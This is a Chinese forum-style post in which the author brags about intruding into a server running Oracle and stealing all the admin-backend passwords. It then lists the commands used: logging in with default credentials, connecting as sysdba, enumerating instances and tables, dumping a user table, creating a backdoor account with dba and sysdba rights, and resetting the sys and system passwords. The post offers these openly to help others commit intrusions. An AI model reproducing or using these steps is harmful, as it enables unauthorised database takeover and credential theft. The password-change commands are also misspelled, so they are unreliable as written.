最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码，我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。

　　1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。

　　2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

　　3、SQL>connect / as sysdba ;(as sysoper)或 connect internal/oracle AS SYSDBA ;(scott/tiger)

　　conn sys/change_on_install as sysdba;

　　4、SQL>startup; 启动数据库实例

　　5、查看当前的所有数据库

　　select * from v$database; 
　　select name from v$database;

        desc v$databases; 查看数据库结构字段

　　6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限

　　SQL>select * from V_$PWFILE_USERS; 
　　Show user;查看当前数据库连接用户

　　7、进入test数据库：database test;

　　8、查看所有的数据库实例：

　　select * from v$instance;
　　如：ora9i

　　9、查看当前库的所有数据表：

　　SQL> select TABLE_NAME from all_tables;
　　select * from all_tables;
　　SQL> select table_name from all_tables where table_name like ‘%u%’;
 　　TABLE_NAME 
　　—————————— 
　　_default_auditing_options_

　　10、查看表结构：desc all_tables;

　　11、显示CQI.T_BBS_XUSER的所有字段结构：

　　desc CQI.T_BBS_XUSER;

　　12、获得CQI.T_BBS_XUSER表中的记录：

　　select * from CQI.T_BBS_XUSER;

　　13、增加数据库用户：(test11/test)

　　create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

　　14、用户授权

　　grant connect,resource,dba to test11; 
　　grant sysdba to test11; 
　　commit;

　　15、更改数据库用户的密码：(将sys与system的密码改为test.)

　　alter user sys indentified by test;
　　alter user system indentified by test;